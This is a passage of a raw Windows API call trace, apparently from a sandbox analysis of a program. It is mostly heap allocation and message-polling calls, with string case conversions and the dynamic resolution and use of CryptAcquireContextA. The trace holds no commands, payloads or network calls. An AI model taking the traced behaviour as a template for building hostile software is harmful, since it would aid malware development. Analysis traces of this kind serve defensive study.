lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0262.162] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0262.162] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.166] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0262.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0262.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.169] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0262.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0262.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0262.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.170] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0262.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0262.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.170] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0262.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.174] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.175] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.175] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0262.175] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.175] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0262.176] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.176] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.176] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.176] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.176] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.176] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.177] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.177] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.177] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.177] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.177] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.178] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.178] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.178] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.178] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.178] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0262.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.179] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0262.179] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.179] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0262.179] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.179] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 